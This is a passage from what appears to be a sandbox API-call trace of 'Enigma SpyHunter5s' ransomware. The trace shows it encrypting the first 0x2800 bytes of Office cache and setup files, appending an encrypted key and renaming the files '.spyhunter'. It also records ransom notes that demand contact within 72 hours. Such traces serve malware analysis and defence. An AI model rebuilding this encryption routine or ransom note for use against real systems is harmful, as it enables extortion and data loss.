out: hHeap=0x2c0000) returned 1 [0083.789] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fee0 | out: pbBuffer=0x270fee0) returned 1 [0083.789] GetProcessHeap () returned 0x2c0000 [0083.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0083.789] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270fed8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270fed8*=0x30) returned 1 [0083.789] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0083.789] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 80 [0083.789] StrStrW (lpFirst="OfficeMUI.msi", lpSrch=".txt") returned 0x0 [0083.789] GetProcessHeap () returned 0x2c0000 [0083.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32bdc0 [0083.789] ReadFile (in: hFile=0xcc, lpBuffer=0x32bdc0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fe9c, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesRead=0x270fe9c*=0x2800, lpOverlapped=0x0) returned 1 [0083.796] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.796] WriteFile (in: hFile=0xcc, lpBuffer=0x32bdc0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fe9c, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesWritten=0x270fe9c*=0x2800, lpOverlapped=0x0) returned 1 [0083.796] GetProcessHeap () returned 0x2c0000 [0083.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bdc0 | out: hHeap=0x2c0000) returned 1 [0083.796] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.796] WriteFile (in: hFile=0xcc, lpBuffer=0x270fedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fe9c, lpOverlapped=0x0 | out: lpBuffer=0x270fedc*, lpNumberOfBytesWritten=0x270fe9c*=0x4, lpOverlapped=0x0) returned 1 [0083.806] WriteFile (in: hFile=0xcc, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fe9c, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x270fe9c*=0x30, lpOverlapped=0x0) returned 1 [0083.806] CloseHandle (hObject=0xcc) returned 1 [0084.099] GetProcessHeap () returned 0x2c0000 [0084.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0084.099] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.spyhunter") returned 90 [0084.099] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.spyhunter")) returned 1 [0084.100] GetProcessHeap () returned 0x2c0000 [0084.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0084.100] GetProcessHeap () returned 0x2c0000 [0084.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0084.100] GetProcessHeap () returned 0x2c0000 [0084.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3280a8 | out: hHeap=0x2c0000) returned 1 [0084.100] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0084.100] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0084.100] WriteFile (in: hFile=0xcc, lpBuffer=0x270fe0f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ff38, lpOverlapped=0x0 | out: lpBuffer=0x270fe0f*, lpNumberOfBytesWritten=0x270ff38*=0x127, lpOverlapped=0x0) returned 1 [0084.101] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0084.101] WriteFile (in: hFile=0xcc, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ff38, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ff38*=0x2ac, lpOverlapped=0x0) returned 1 [0084.101] CloseHandle (hObject=0xcc) returned 1 [0084.101] GetProcessHeap () returned 0x2c0000 [0084.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x328378 | out: hHeap=0x2c0000) returned 1 [0084.101] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fed8 | out: pbBuffer=0x270fed8) returned 1 [0084.101] GetProcessHeap () returned 0x2c0000 [0084.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0084.101] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270fed0*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270fed0*=0x30) returned 1 [0084.102] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0084.102] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0084.102] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0084.102] GetProcessHeap () returned 0x2c0000 [0084.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x330d28 [0084.102] ReadFile (in: hFile=0xcc, lpBuffer=0x330d28, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fe94, lpOverlapped=0x0 | out: lpBuffer=0x330d28*, lpNumberOfBytesRead=0x270fe94*=0xa40, lpOverlapped=0x0) returned 1 [0084.340] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xfffff5c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.340] WriteFile (in: hFile=0xcc, lpBuffer=0x330d28*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x270fe94, lpOverlapped=0x0 | out: lpBuffer=0x330d28*, lpNumberOfBytesWritten=0x270fe94*=0xa40, lpOverlapped=0x0) returned 1 [0084.340] GetProcessHeap () returned 0x2c0000 [0084.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x330d28 | out: hHeap=0x2c0000) returned 1 [0084.340] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.340] WriteFile (in: hFile=0xcc, lpBuffer=0x270fed4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fe94, lpOverlapped=0x0 | out: lpBuffer=0x270fed4*, lpNumberOfBytesWritten=0x270fe94*=0x4, lpOverlapped=0x0) returned 1 [0084.340] WriteFile (in: hFile=0xcc, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fe94, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x270fe94*=0x30, lpOverlapped=0x0) returned 1 [0084.341] CloseHandle (hObject=0xcc) returned 1 [0084.341] GetProcessHeap () returned 0x2c0000 [0084.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x341830 [0084.341] wnsprintfW (in: pszDest=0x341830, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.spyhunter") returned 86 [0084.342] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.spyhunter")) returned 1 [0084.342] GetProcessHeap () returned 0x2c0000 [0084.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x341830 | out: hHeap=0x2c0000) returned 1 [0084.342] GetProcessHeap () returned 0x2c0000 [0084.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0084.342] GetProcessHeap () returned 0x2c0000 [0084.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326600 | out: hHeap=0x2c0000) returned 1 [0084.342] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\$HOWDECRYPT$.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0084.343] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0084.343] WriteFile (in: hFile=0xcc, lpBuffer=0x270fe07*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ff30, lpOverlapped=0x0 | out: lpBuffer=0x270fe07*, lpNumberOfBytesWritten=0x270ff30*=0x127, lpOverlapped=0x0) returned 1 [0084.344] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0084.344] WriteFile (in: hFile=0xcc, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ff30, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ff30*=0x2ac, lpOverlapped=0x0) returned 1 [0084.345] CloseHandle (hObject=0xcc) returned 1 [0084.345] GetProcessHeap () returned 0x2c0000 [0084.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fb18 | out: hHeap=0x2c0000) returned 1 [0084.345] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fed0 | out: pbBuffer=0x270fed0) returned 1 [0084.345] GetProcessHeap () returned 0x2c0000 [0084.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0084.345] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270fec8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270fec8*=0x30) returned 1 [0084.345] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0084.346] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0084.346] StrStrW (lpFirst="branding.xml", lpSrch=".txt") returned 0x0 [0084.346] GetProcessHeap () returned 0x2c0000 [0084.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x330d28 [0084.347] ReadFile (in: hFile=0xcc, lpBuffer=0x330d28, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fe8c, lpOverlapped=0x0 | out: lpBuffer=0x330d28*, lpNumberOfBytesRead=0x270fe8c*=0x2800, lpOverlapped=0x0) returned 1 [0084.381] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.381] WriteFile (in: hFile=0xcc, lpBuffer=0x330d28*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fe8c, lpOverlapped=0x0 | out: lpBuffer=0x330d28*, lpNumberOfBytesWritten=0x270fe8c*=0x2800, lpOverlapped=0x0) returned 1 [0084.382] GetProcessHeap () returned 0x2c0000 [0084.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x330d28 | out: hHeap=0x2c0000) returned 1 [0084.382] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.382] WriteFile (in: hFile=0xcc, lpBuffer=0x270fecc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fe8c, lpOverlapped=0x0 | out: lpBuffer=0x270fecc*, lpNumberOfBytesWritten=0x270fe8c*=0x4, lpOverlapped=0x0) returned 1 [0084.384] WriteFile (in: hFile=0xcc, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fe8c, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x270fe8c*=0x30, lpOverlapped=0x0) returned 1 [0084.384] CloseHandle (hObject=0xcc) returned 1 [0084.519] GetProcessHeap () returned 0x2c0000 [0084.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0084.519] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.spyhunter") returned 102 [0084.519] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.spyhunter")) returned 1 [0084.536] GetProcessHeap () returned 0x2c0000 [0084.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0084.537] GetProcessHeap () returned 0x2c0000 [0084.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0084.537] GetProcessHeap () returned 0x2c0000 [0084.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x330c20 | out: hHeap=0x2c0000) returned 1 [0084.537] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fec8 | out: pbBuffer=0x270fec8) returned 1 [0084.537] GetProcessHeap () returned 0x2c0000 [0084.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0084.537] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270fec0*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270fec0*=0x30) returned 1 [0084.537] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0084.537] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0084.537] StrStrW (lpFirst="setup.exe", lpSrch=".txt") returned 0x0 [0084.537] GetProcessHeap () returned 0x2c0000 [0084.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x33efe8 [0084.537] ReadFile (in: hFile=0xcc, lpBuffer=0x33efe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fe84, lpOverlapped=0x0 | out: lpBuffer=0x33efe8*, lpNumberOfBytesRead=0x270fe84*=0x2800, lpOverlapped=0x0) returned 1 [0084.620] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.620] WriteFile (in: hFile=0xcc, lpBuffer=0x33efe8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fe84, lpOverlapped=0x0 | out: lpBuffer=0x33efe8*, lpNumberOfBytesWritten=0x270fe84*=0x2800, lpOverlapped=0x0) returned 1 [0084.620] GetProcessHeap () returned 0x2c0000 [0084.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0084.620] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.620] WriteFile (in: hFile=0xcc, lpBuffer=0x270fec4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fe84, lpOverlapped=0x0 | out: lpBuffer=0x270fec4*, lpNumberOfBytesWritten=0x270fe84*=0x4, lpOverlapped=0x0) returned 1 [0084.637] WriteFile (in: hFile=0xcc, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fe84, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x270fe84*=0x30, lpOverlapped=0x0) returned 1 [0084.637] CloseHandle (hObject=0xcc) returned 1 [0084.733] GetProcessHeap () returned 0x2c0000 [0084.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0084.733] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.spyhunter") returned 86 [0084.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.spyhunter" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.spyhunter")) returned 1 [0084.733] GetProcessHeap () returned 0x2c0000 [0084.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0084.733] GetProcessHeap () returned 0x2c0000 [0084.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0084.733] GetProcessHeap () returned 0x2c0000 [0084.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326c58 | out: hHeap=0x2c0000) returned 1 [0084.734] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fec8 | out: pbBuffer=0x270fec8) returned 1 [0084.734] GetProcessHeap () returned 0x2c0000 [0084.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0084.734] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270fec0*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270fec0*=0x30) returned 1 [0084.734] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0084.735] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0084.735] StrStrW (lpFirst="setup.exe", lpSrch=".txt") returned 0x0 [0084.735] GetProcessHeap () returned 0x2c0000 [0084.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x33efe8 [0084.735] ReadFile (in: hFile=0xcc, lpBuffer=0x33efe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fe84, lpOverlapped=0x0 | out: lpBuffer=0x33efe8*, lpNumberOfBytesRead=0x270fe84*=0x2800, lpOverlapped=0x0) returned 1 [0084.754] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.754] WriteFile (in: hFile=0xcc, lpBuffer=0x33efe8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fe84, lpOverlapped=0x0 | out: lpBuffer=0x33efe8*, lpNumberOfBytesWritten=0x270fe84*=0x2800, lpOverlapped=0x0) returned 1 [0084.755] GetProcessHeap () returned 0x2c0000 [0084.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0084.755] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.755] WriteFile (in: hFile=0xcc, lpBuffer=0x270fec4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fe84, lpOverlapped=0x0 | out: lpBuffer=0x270fec4*, lpNumberOfBytesWritten=0x270fe84*=0x4, lpOverlapped=0x0) returned 1 [0084.763] WriteFile (in: hFile=0xcc, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fe84, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x270fe84*=0x30, lpOverlapped=0x0) returned 1 [0084.763] CloseHandle (hObject=0xcc) returned 1 [0084.878] GetProcessHeap () returned 0x2c0000 [0084.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f078 [0084.879] wnsprintfW (in: pszDest=0x35f078, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.spyhunter") returned 86 [0084.879] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.spyhunter" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.spyhunter")) returned 1 [0084.879] GetProcessHeap () returned 0x2c0000 [0084.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f078 | out: hHeap=0x2c0000) returned 1 [0084.879] GetProcessHeap () returned 0x2c0000 [0084.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0084.879] GetProcessHeap () returned 0x2c0000 [0084.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3272b0 | out: hHeap=0x2c0000) returned 1 [0084.879] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common 